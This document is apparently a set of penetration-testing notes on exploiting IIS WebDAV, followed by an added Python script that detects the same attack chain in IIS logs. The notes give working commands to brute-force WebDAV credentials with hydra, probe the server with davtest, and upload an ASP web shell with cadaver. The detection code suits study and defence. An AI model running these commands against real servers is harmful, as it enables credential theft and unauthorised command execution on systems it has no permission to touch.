Frequently exploited Windows Services

IIS WebDAV
General information
IIS
Default ports: 80, 443
Supported executable file types: .asp, .aspx, .config, .php
WebDAV
WebDAV is a protocol that allows you to edit web content on a server over HTTP or HTTPS connections. It has advantages over FTP, such as more security options and file locking.
Default ports: 80, 443
Needs legitimate credentials, since it implements authentication in the form of a username/password.
Steps of exploitation
Enumeration. Identify whether WebDAV has been configured to run on the IIS web server.
Brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.
Upload a malicious file (such as a .asp payload) and execute arbitrary commands or obtain a reverse shell on the target.
Useful tools
davtest -> Used to scan, authenticate to and exploit a WebDAV server.
cadaver -> Supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.
Exploitation
nmap
nmap -sV -sC $IP

nmap deep dive
nmap -sV -p 80 --script=http-enum $IP

Bruteforce the authentication
The address will be http://$IP/webdav/
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt $IP http-get /webdav/
davtest
davtest -auth admin:password_123 -url http://$IP/webdav

The most important section of the output is the list of extensions that execute: from it we can see that .asp files can be executed, so we can get our reverse shell with that.

cadaver
cadaver http://$IP/webdav
Enter the credentials to get a cadaver command prompt.
Use the Kali Linux pre-packaged web shells to upload a file and get access.
Folder:
/usr/share/webshells
Using the cadaver shell, upload the web shell:
put /usr/share/webshells/asp/cmd
Then browse to the uploaded file in the web UI to execute the web shell.
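The defender's counterpart to the chain above (brute force with hydra, upload with cadaver, execution through the browser) is spotting each stage in the IIS W3C extended logs. The following is an added example, not part of the original notes or of any of the tools named: it parses a constructed log excerpt (the field layout, IPs, user name and paths are all made up for the demo) and raises one alert per stage. The brute-force threshold and the /webdav/ prefix are assumptions to tune for a real server.

```python
"""Added example: spotting the WebDAV attack chain (brute force, web shell
upload, web shell execution) in IIS W3C extended log lines."""
from collections import Counter

# Extensions IIS hands to a script engine; matches the list on this page.
EXEC_EXTENSIONS = (".asp", ".aspx", ".config", ".php")
# WebDAV methods that create or rename content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY"}
# Failed logins from one client against the WebDAV path before alerting
# (assumption; tune to the server's normal traffic).
BRUTE_FORCE_THRESHOLD = 5
WEBDAV_PREFIX = "/webdav/"  # assumption: the share lives here, as on this page

# Constructed sample log in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus
2024-01-15 10:00:01 10.0.0.5 GET /index.html - 80 - 10.0.0.20 Mozilla/5.0 200 0
2024-01-15 10:00:02 10.0.0.5 OPTIONS /webdav/ - 80 - 10.0.0.50 Mozilla/5.0 401 2
2024-01-15 10:00:03 10.0.0.5 GET /webdav/ - 80 - 10.0.0.50 Mozilla/5.0 401 2
2024-01-15 10:00:03 10.0.0.5 GET /webdav/ - 80 - 10.0.0.50 Mozilla/5.0 401 2
2024-01-15 10:00:04 10.0.0.5 GET /webdav/ - 80 - 10.0.0.50 Mozilla/5.0 401 2
2024-01-15 10:00:04 10.0.0.5 GET /webdav/ - 80 - 10.0.0.50 Mozilla/5.0 401 2
2024-01-15 10:00:05 10.0.0.5 GET /webdav/ - 80 - 10.0.0.50 Mozilla/5.0 401 2
2024-01-15 10:00:10 10.0.0.5 GET /webdav/ - 80 admin 10.0.0.50 Mozilla/5.0 200 0
2024-01-15 10:00:12 10.0.0.5 PUT /webdav/cmd.asp - 80 admin 10.0.0.50 cadaver/0.23.3 201 0
2024-01-15 10:00:15 10.0.0.5 GET /webdav/cmd.asp - 80 - 10.0.0.50 Mozilla/5.0 200 0
2024-01-15 10:01:00 10.0.0.5 PUT /webdav/notes.txt - 80 admin 10.0.0.20 cadaver/0.23.3 201 0
"""


def parse_iis_log(text):
    """Parse W3C extended log text into one dict per request, keyed by the
    names in the '#Fields:' directive. Other '#' directive lines are skipped."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log line seen before a #Fields: directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed lines rather than mis-assign columns
        records.append(dict(zip(fields, values)))
    return records


def analyze(records):
    """Return one alert dict per detected stage of the attack chain."""
    alerts = []
    failed_auth = Counter()
    uploaded = set()  # URI stems written via WebDAV with an executable extension

    for r in records:
        ip = r["c-ip"]
        method = r["cs-method"].upper()
        stem = r["cs-uri-stem"]
        status = r["sc-status"]

        # Stage 1: repeated 401s against the WebDAV share from one client.
        if status == "401" and stem.startswith(WEBDAV_PREFIX):
            failed_auth[ip] += 1
            if failed_auth[ip] == BRUTE_FORCE_THRESHOLD:
                alerts.append({"type": "webdav_bruteforce", "c-ip": ip,
                               "detail": f"{BRUTE_FORCE_THRESHOLD}+ failed logins"})

        # Stage 2: a write method that lands a script file on the server.
        if (method in WRITE_METHODS and status.startswith("2")
                and stem.lower().endswith(EXEC_EXTENSIONS)):
            uploaded.add(stem)
            alerts.append({"type": "webshell_upload", "c-ip": ip,
                           "detail": f"{method} {stem} by user {r['cs-username']}"})

        # Stage 3: the uploaded script is then requested successfully.
        if method in {"GET", "POST"} and status == "200" and stem in uploaded:
            alerts.append({"type": "webshell_execution", "c-ip": ip,
                           "detail": f"{method} {stem}"})
    return alerts


def detect(text):
    """Convenience wrapper: raw log text in, alerts out."""
    return analyze(parse_iis_log(text))


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert["type"], alert["c-ip"], alert["detail"])
```

On the sample the three alerts all come from the same client: the brute-force alert fires on the fifth 401, the PUT of cmd.asp is flagged as an upload, and the later GET of that path as execution; the benign PUT of notes.txt from another client produces nothing. Pointing this at real logs means reading the actual `#Fields:` line from the server, since IIS lets administrators pick which columns are logged.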